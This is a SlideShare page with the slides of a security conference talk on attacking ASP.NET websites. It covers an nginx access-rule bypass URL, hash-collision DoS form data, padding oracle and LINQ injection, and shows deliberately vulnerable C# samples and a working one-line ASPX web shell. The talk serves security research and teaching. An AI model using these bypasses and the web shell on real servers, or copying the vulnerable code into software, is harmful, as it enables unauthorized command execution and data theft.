SlideShare a Scribd company logo

Hack ASP.NET website

Download as PPTX, PDF
Positive Hack Days
Positive Hack Days

Hack an ASP .NET website? Hard, but possible! Presentation by Vladimir Kochetkov at Positive Hack Days

Technology
1 of 30
TO HACK AN ASP .NET WEBSITE? HARD, BUT POSSIBLE! Vladimir Kochetkov Positive Technologies
A Blast From The Past: File System DOS devices and reserved names: NUL:, CON:, AUX:, PRN:, COM[1-9]:, LPT[1-9]: - the colon is optional, names can be used as part of the path Reserved characters: < > : " / | ? * Case insensitivity of names: Filename == FileName == filename == FILENAME Support for short names 8.3: LongFileName.Extension ~= LONGFI~1.EXT ~= LO0135~1.EXT Ending characters: Filename == Filename... == Filename
A Blast From The Past: File System Named pipe and mailslots (CreateFile): Hostpipe<name> , Hostmailslot<name> Alternative syntax of relative paths: C:Windowsnotepad.exe == C:notepad.exe , if Windows is a current catalog of C: Substitutions (FindFirstFile): < == * , > == ? , " == . UNC and Unicode paths: C:WindowsSystem32 HostC$WindowsSystem32 .C:WindowsSystem32 ?C:WindowsSystem32 ?UNCHostC$WindowsSystem32
A Blast From The Past: File System Meta attributes and NTFS alternative data streams: Directory:<Name>:<Type>File:<Name>:<Type> Files Meta Attributes Indices Meta Attributes $STANDARD_INFORMATION $INDEX_ROOT $FILE_NAME $INDEX_ALLOCATION $DATA $BITMAP $ATTRIBUTE_LIST $OBJECT_ID $REPARSE_POINT C:Windowshh.exe == C:Windows:$I30:$INDEX_ALLOCATIONhh.exe C:Windowsnotepad.exe == C:Windowsnotepad.exe::$DATA FileName.aspx == FileName.aspx:.jpg
[PT-2012-06] Nginx Restrictions Bypass Severity level: Medium (5.0) (AV:N/AC:L/Au:N/C:P/I:N/A:N) Vulnerable versions: Nginx for Windows <= v1.3 Vector: Remote The flaw enables an intruder to forward HTTP requests to certain URL addresses, bypassing the rules set in the Location directives of the web server configuration. By exploiting the vulnerability, a potential hacker could gain access to the application source code and closed parts of the website, detect new vulnerabilities, steal passwords to the database or other services, etc. :$I30:$INDEX_ALLOCATION were processed as a part of the catalog name.
[PT-2012-06] Nginx Restrictions Bypass http://hostname/.svn/entries HTTP/1.1 403 Forbidden Server: nginx/1.2.0 … location ~/.svn/ { deny all; } … HTTP/1.1 200 OK Server: nginx/1.2.0 http://hostname/.svn::$INDEX_ALLOCATION/entries * A stable version of nginx-1.2.0 for Windows, released 2012-04-23
.NET Platform Architecture
Memory Corruption Interaction with native libraries, use of mix assemblies MS12-025, April 2012: - arbitrary code execution is triggered by exploitation of an integer overflow vulnerability in gdiplus.dll which causes heap corruption when calling the constructor of the System.Drawing.Imaging.EncoderParameter class. Insecure managed code unsafe void bufferOverflow(string s) { char* ptr = stackalloc char[10]; foreach (var c in s) { *ptr++ = c } }
Turkish I And Other Peculiarities If two strings are compared with no regard to the current regional settings, the result might be quite unexpected: The English language: I&i The Turkish language: I&ı+İ&i <%@ Page Language="C#" Culture="Auto" %> <%@ Import Namespace="System.Globalization" %> <! DOCTYPE html> … <script runat="server"> … if (Session["mode"].ToLower() != "admin") … if (String.Compare(Request["path"]), 0, "FILE:", 0, 5, true) …
Collision of Object Hashes System.Object.GetHashCode() returns a 32 bit hash code of an object (takes on values within the range from -2147483648 to 2147483647). (http://blogs.msdn.com/b/ericlippert/archive/2010/03/22/socks-birthdays-and-hash-collisions.aspx)
Collision in ASP .NET (MS11-100) Standard situation: Unusual situation: 3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=&9PZGHCDJYD=&NU73S3KNV=&IF686YJQJ8K=&9XUUCJEENJ=&F X4A75F91FM=&IGJKQVBZAVK=&LJVJV6J3UZ=&X7GJ5MWXY=&6AVIZWTVK=&WQNIQ7OZMS=&IM1VKMZHK6F=& DO9WX2R9H=&RYLZSIQT8V=&KR9BBFUH2E=&UI8N4SWVWW=&TL5F6URVPP=&B1P81FWDSVV=&CM6Y80XSAO=& LE72GBPWB=&EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQOM138LL=&XXST36DRX=&JR YRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM0TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=& MOCGW14ZU7=&I0JKKKOG7EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D3ACY8973E= =&VGJPMCQHP=&AV6THWSCA7=&MH5SM8NPWB1=&P57KEP668X=&81C4LQ4DFY=&MPJBASYMRM=&25EWGNN5NE … over 4Mb form data … (https://github.com/HybrisDisaster/aspHashDoS)
A Tricky Plan (Post-Mortem MS11-100) 1. Create 1000 collision strings for each combination ‘.NET version’/’hardware platform’ 2. Send each combination as POST request parameters 3. Measure the response time for each request 4. ??? 5. ;)
.NET Web stack
ASP.NET / MVC
ASP.NET Peculiarities Special catalogs and files: - App_Browser –browsers definition (*.browsers) - App_Code – a source code of helper classes and logics - App_Data – data stores - App_GlobalResources, App_LocalResources – application resources (*.resx, *.resources) - App_Themes – topics (*.skin, *.css, images, etc); - App_WebReferences – links to web services (*.wsdl, *.xsd, *.disco, *.discomap) - Bin – compiled builds used by the application - web.config, web.*.config – configuration files that determine settings of the web server and application
ASP .NET Peculiarities Standard HTTP handlers: - WebResource.axd – access to the static resources embedded in the application assemblies. - ScriptResource.axd – access to JavaScripts embedded in the assemblies or stored on the disk. Usage: http://hostname/*Resource.axd?d=<resourceId>&t=<timestamp> Example: http://hostname/ScriptResource.axd?d=JuN78WBP_dBUR_BT9LH1wlP 8mXnNcENfktCX8YwH3sHG7wWwvn73TZaaChQhQtyzip3- kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1 where ‘d’ is an encrypted parameters: Q|~/Scripts/Script1.js,~/Scripts/Script2.js,~/Scripts/Script3.js|#|21c3 8a3a9b
Padding Oracle (MS10-070) Consequences: – getting encryption/decryption keys:  authentication cookies  ViewState and Event Validation  Arguments for WebRecource.axd and ScriptResource.axd => Reading arbitrary files inside the application catalog Corrections:  Padding error returns a generic error message  A random number is used as IV  The format of encrypted strings is changed for their validation  ScriptResource.axd can handle only *.js files
ASP .NET Features Standard HTTP handlers: - Trace.axd request tracing (available only in the debugging mode)
Features of LFI exploitation Response.WriteFile(<vfilename>) - Allows including any file, except *.config, inside the application catalog - The file is included statically without code execution - Accepts virtual file name as an argument Server.Execute(<vfilename>) - Allows including any file, except for *.config, into the application catalog - Calls a handler for the sent file, includes the result into the response - Accepts virtual file name as an argument File.ReadAllText(<filename>) - Allows including any file if obtains enough privileges - The file is included statically without code execution - Accepts file name as an argument
Minimum C# Shell <%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <%= Process.Start( new ProcessStartInfo( "cmd","/c " + Request["c"] ) { UseShellExecute = false, RedirectStandardOutput = true } ).StandardOutput.ReadToEnd() %>
ViewState Meant to transfer data on view element to the server. - Is transferred in the __VIEWSTATE parameter - Encryption and integrity are not ensured in many cases - Is used by developers for session data storage on the client, though is not meant for this - Violation of its integrity can trigger exploitation of various threats from XXS to violation of application’s functionality.
Request and Event Validations Request Validation is an embedded simple WAF aimed at preventing XSS. Blocks all requests that contain: &# < followed by a letter, !, / and ? Besides, it skips extraneous parameters started with с __ Event Validation is an embedded mechanism of event data validation. It is a __EVENTVALIDATION parameter that stores hashes of acceptable elements of of forms, events, ViewState, etc. Contrary to the common belief, it is insufficient against CSRF attacks as a standard implementation instance.
Mass Assignment Model: Controller: public class User public class UserController : Controller { { public int Id IUserRepository _userRepository; { get; set; } public UserController(IUserRepository userRepository) { public string UserName _userRepository = userRepository; { get; set; } } public string Password { get; set; } public ActionResult Edit(int id) { public bool IsAdmin var user = _userRepository.GetUserById(id); { get; set; } return View(user); } } [HttpPost] public ActionResult Edit(int id, FormCollection collection) { try { var user = _userRepository.GetUserById(id); UpdateModel(user); _userRepository.SaveUser(user); return RedirectToAction("Index"); } catch { return View(); } } }
Mass Assignment (http://digitalbush.com/2012/03/05/mass-assignment-aspnet-mvc/)
LINQ Injection LINQ is a query language embedded into the syntax of the .NET languages. var result = from item in itemsList where item.field1 % 2 == 0 orderby item.field2 descending select new { item.field2, item.field3 }; Expression.Lambda<Predicate<int>>( Expression.Equal( Expression.Modulo( parameterN, Expression.Constant(2) ), Expression.Constant(0) ), parameterN); var result = itemsList .Where(x => x.field1 % 2 == 0) .Select(x => new { x.field2, x.field3 }) .OrderByDescending(x => x.field2);
LINQ Injection Dynamic LINQ is one of a few libraries used to create dynamic run- time LINQ requests. Features: - Definition of expressions by strings; var modifier = "0"; - Basic simple operations var result = itemsList - Access to members of static and .Where("field1 % 2 == " + modifier) .Select(x => new { x.field2, x.field3 }) instant data types .OrderByDescending(x => x.field2); - Type instantiation and anonymous types construction What if "modifier" is formed out of input data and contains 0 OR 1 == 1 ?
LINQ Injection Injection’s limitations in Dynamic LINQ: - Access to fields, properties and methods is available only for a collection type or for accessible types specified in the ‘white list’ - All expression parts must be executed without errors; error messages do not contain useful output - Injection is performable only for isolated parts of requests Injection’s possibilities in Dynamic LINQ: - Authentication / authorization bypass - Unauthorized access to the collection data - Abuse of functionality (provided that the collection objects have the statefull fields) - Conduction of DoS attacks (DoS). Remote Code Execution is actual in other solutions
NorthWind DEMO public AjaxStoreResult GetCustomers(int limit, int start, string dir, string sort) { var query = (from c in this.DBContext.Customers select new { c.CustomerID, c.CompanyName, c.ContactName, c.Phone, c.Fax, c.Region }).OrderBy(string.Concat(sort, " ", dir)); int total = query.ToList().Count; query = query.Skip(start).Take(limit); return new AjaxStoreResult(query, total); }
NorthWind DEMO Demo
Thank You for Your Attention! Questions? vkohetkov@ptsecurity.ru twitter: @kochetkov_v

Recommended

Electronic Payment System
Electronic Payment SystemElectronic Payment System
Electronic Payment SystemRitesh Goyal
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website? Positive Hack Days
 
E commerce
E commerceE commerce
E commerceSatish Kumar
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
E commerce and internet in Pakistan
E commerce and internet in PakistanE commerce and internet in Pakistan
E commerce and internet in PakistanMis bah
 
UPI Technology
UPI TechnologyUPI Technology
UPI Technologyindiastack
 
Analysis of database tampering
Analysis of database tamperingAnalysis of database tampering
Analysis of database tamperingsaddamhusain hadimani
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 

Recommended

Electronic Payment System
Electronic Payment SystemElectronic Payment System
Electronic Payment SystemRitesh Goyal
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website? Positive Hack Days
 
E commerce
E commerceE commerce
E commerceSatish Kumar
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
E commerce and internet in Pakistan
E commerce and internet in PakistanE commerce and internet in Pakistan
E commerce and internet in PakistanMis bah
 
UPI Technology
UPI TechnologyUPI Technology
UPI Technologyindiastack
 
Analysis of database tampering
Analysis of database tamperingAnalysis of database tampering
Analysis of database tamperingsaddamhusain hadimani
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Electronic Payment Systems in E Commerce
Electronic Payment Systems in E CommerceElectronic Payment Systems in E Commerce
Electronic Payment Systems in E CommerceVinay Chaithanya
 
Foundation Capital Research: The E-Commerce Landscape
Foundation Capital Research: The E-Commerce LandscapeFoundation Capital Research: The E-Commerce Landscape
Foundation Capital Research: The E-Commerce LandscapeJeff Grimes
 
UPI Presentation.pptx
UPI Presentation.pptxUPI Presentation.pptx
UPI Presentation.pptxRaushanKumar375157
 
Session fixation
Session fixationSession fixation
Session fixationMuhammad Fahri
 
Network security for E-Commerce
Network security for E-CommerceNetwork security for E-Commerce
Network security for E-CommerceHem Pokhrel
 
E banking security
E banking securityE banking security
E banking securityIman Rahmanian
 
Unified Payment Interface
Unified Payment InterfaceUnified Payment Interface
Unified Payment InterfaceAkash Chandra
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 
Web application security the fast guide
Web application security the fast guideWeb application security the fast guide
Web application security the fast guideDr.Sami Khiami
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 
Assignment Front page
Assignment Front pageAssignment Front page
Assignment Front pageMahmudul Hasan
 
Email security
Email securityEmail security
Email securityIndrajit Sreemany
 
E Commerce -Security Threats and Challenges
E Commerce -Security Threats and ChallengesE Commerce -Security Threats and Challenges
E Commerce -Security Threats and ChallengesInderjeet Singh
 
e-Eommerce - Framework
e-Eommerce - Frameworke-Eommerce - Framework
e-Eommerce - FrameworkSnehasish Mandal
 
Cyber Crime and Security
Cyber Crime and SecurityCyber Crime and Security
Cyber Crime and SecurityMd Nishad
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Secure electronic transaction ppt
Secure electronic transaction pptSecure electronic transaction ppt
Secure electronic transaction pptSubhash Gupta
 
Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NETPositive Hack Days
 
Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacksAlexandre Moneger
 

More Related Content

What's hot

SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Electronic Payment Systems in E Commerce
Electronic Payment Systems in E CommerceElectronic Payment Systems in E Commerce
Electronic Payment Systems in E CommerceVinay Chaithanya
 
Foundation Capital Research: The E-Commerce Landscape
Foundation Capital Research: The E-Commerce LandscapeFoundation Capital Research: The E-Commerce Landscape
Foundation Capital Research: The E-Commerce LandscapeJeff Grimes
 
Network security for E-Commerce
Network security for E-CommerceNetwork security for E-Commerce
Network security for E-CommerceHem Pokhrel
 
Unified Payment Interface
Unified Payment InterfaceUnified Payment Interface
Unified Payment InterfaceAkash Chandra
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 
Web application security the fast guide
Web application security the fast guideWeb application security the fast guide
Web application security the fast guideDr.Sami Khiami
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 
E Commerce -Security Threats and Challenges
E Commerce -Security Threats and ChallengesE Commerce -Security Threats and Challenges
E Commerce -Security Threats and ChallengesInderjeet Singh
 
Cyber Crime and Security
Cyber Crime and SecurityCyber Crime and Security
Cyber Crime and SecurityMd Nishad
 
Secure electronic transaction ppt
Secure electronic transaction pptSecure electronic transaction ppt
Secure electronic transaction pptSubhash Gupta
 

What's hot (20)

SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Electronic Payment Systems in E Commerce
Electronic Payment Systems in E CommerceElectronic Payment Systems in E Commerce
Electronic Payment Systems in E Commerce
 
Foundation Capital Research: The E-Commerce Landscape
Foundation Capital Research: The E-Commerce LandscapeFoundation Capital Research: The E-Commerce Landscape
Foundation Capital Research: The E-Commerce Landscape
 
UPI Presentation.pptx
UPI Presentation.pptxUPI Presentation.pptx
UPI Presentation.pptx
 
Session fixation
Session fixationSession fixation
Session fixation
 
Network security for E-Commerce
Network security for E-CommerceNetwork security for E-Commerce
Network security for E-Commerce
 
E banking security
E banking securityE banking security
E banking security
 
Unified Payment Interface
Unified Payment InterfaceUnified Payment Interface
Unified Payment Interface
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Web application security the fast guide
Web application security the fast guideWeb application security the fast guide
Web application security the fast guide
 
Social engineering
Social engineeringSocial engineering
Social engineering
 
Assignment Front page
Assignment Front pageAssignment Front page
Assignment Front page
 
Email security
Email securityEmail security
Email security
 
E Commerce -Security Threats and Challenges
E Commerce -Security Threats and ChallengesE Commerce -Security Threats and Challenges
E Commerce -Security Threats and Challenges
 
e-Eommerce - Framework
e-Eommerce - Frameworke-Eommerce - Framework
e-Eommerce - Framework
 
Cyber Crime and Security
Cyber Crime and SecurityCyber Crime and Security
Cyber Crime and Security
 
Sql injection
Sql injectionSql injection
Sql injection
 
Secure electronic transaction ppt
Secure electronic transaction pptSecure electronic transaction ppt
Secure electronic transaction ppt
 

Viewers also liked

Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NETPositive Hack Days
 
Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacksAlexandre Moneger
 
Mobilise your ASP.NET website
Mobilise your ASP.NET websiteMobilise your ASP.NET website
Mobilise your ASP.NET websiteMatt Lacey
 
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...Start Pad
 
How to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NETHow to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NETPuneet Arora
 
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Vladimir Kochetkov
 
Claims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners GuideClaims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners GuidePhuong Nguyen
 
Understanding Claim based Authentication
Understanding Claim based AuthenticationUnderstanding Claim based Authentication
Understanding Claim based AuthenticationMohammad Yousri
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionSatyajit Mukherjee
 
Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible! Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible! Vladimir Kochetkov
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroubleImperva
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Ansgar Jahns
 
Formazione formatori
Formazione formatori Formazione formatori
Formazione formatori stefano preto
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foodymrp4
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Jacqueline Vickery
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social businesspiero itta
 
parameter tampering
parameter tamperingparameter tampering
parameter tamperingIlsun Choi
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyLeandro Rangel
 

Viewers also liked (20)

Взломать сайт на ASP.NET
Взломать сайт на ASP.NETВзломать сайт на ASP.NET
Взломать сайт на ASP.NET
 
Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacks
 
Mobilise your ASP.NET website
Mobilise your ASP.NET websiteMobilise your ASP.NET website
Mobilise your ASP.NET website
 
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 ...
 
How to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NETHow to create Orkut kind of Website in ASP.NET
How to create Orkut kind of Website in ASP.NET
 
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!
 
Claims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners GuideClaims Based Authentication A Beginners Guide
Claims Based Authentication A Beginners Guide
 
Understanding Claim based Authentication
Understanding Claim based AuthenticationUnderstanding Claim based Authentication
Understanding Claim based Authentication
 
Havij dork
Havij dorkHavij dork
Havij dork
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injection
 
Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible! Hack an ASP .NET website? Hard, but possible!
Hack an ASP .NET website? Hard, but possible!
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized Trouble
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021
 
Formazione formatori
Formazione formatori Formazione formatori
Formazione formatori
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foody
 
M Power
M PowerM Power
M Power
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social business
 
parameter tampering
parameter tamperingparameter tampering
parameter tampering
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.Joy
 

Similar to Hack ASP.NET website

SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersoazabir
 
Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)dantleech
 
Ch 04 asp.net application
Ch 04 asp.net application Ch 04 asp.net application
Ch 04 asp.net application Madhuri Kavade
 
Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...Timur Shemsedinov
 
nodejs_at_a_glance.ppt
nodejs_at_a_glance.pptnodejs_at_a_glance.ppt
nodejs_at_a_glance.pptWalaSidhom1
 
Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!Luca Lusso
 
Local SQLite Database with Node for beginners
Local SQLite Database with Node for beginnersLocal SQLite Database with Node for beginners
Local SQLite Database with Node for beginnersLaurence Svekis ✔
 
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...Ivanti
 

Similar to Hack ASP.NET website (20)

SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
Bh Win 03 Rileybollefer
Bh Win 03 RileybolleferBh Win 03 Rileybollefer
Bh Win 03 Rileybollefer
 
Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)Exploring Async PHP (SF Live Berlin 2019)
Exploring Async PHP (SF Live Berlin 2019)
 
Ch 04 asp.net application
Ch 04 asp.net application Ch 04 asp.net application
Ch 04 asp.net application
 
Ch23 system administration
Ch23 system administration Ch23 system administration
Ch23 system administration
 
IIS 7: The Administrator’s Guide
IIS 7: The Administrator’s GuideIIS 7: The Administrator’s Guide
IIS 7: The Administrator’s Guide
 
Book
BookBook
Book
 
Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...Rapid API development examples for Impress Application Server / Node.js (jsfw...
Rapid API development examples for Impress Application Server / Node.js (jsfw...
 
nodejs_at_a_glance.ppt
nodejs_at_a_glance.pptnodejs_at_a_glance.ppt
nodejs_at_a_glance.ppt
 
Asp.net tips
Asp.net tipsAsp.net tips
Asp.net tips
 
RESTEasy
RESTEasyRESTEasy
RESTEasy
 
Asp.net
Asp.netAsp.net
Asp.net
 
Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!Do you know what your drupal is doing? Observe it!
Do you know what your drupal is doing? Observe it!
 
Web Security
Web SecurityWeb Security
Web Security
 
Local SQLite Database with Node for beginners
Local SQLite Database with Node for beginnersLocal SQLite Database with Node for beginners
Local SQLite Database with Node for beginners
 
Red5 - PHUG Workshops
Red5 - PHUG WorkshopsRed5 - PHUG Workshops
Red5 - PHUG Workshops
 
Practical OData
Practical ODataPractical OData
Practical OData
 
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
 

More from Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
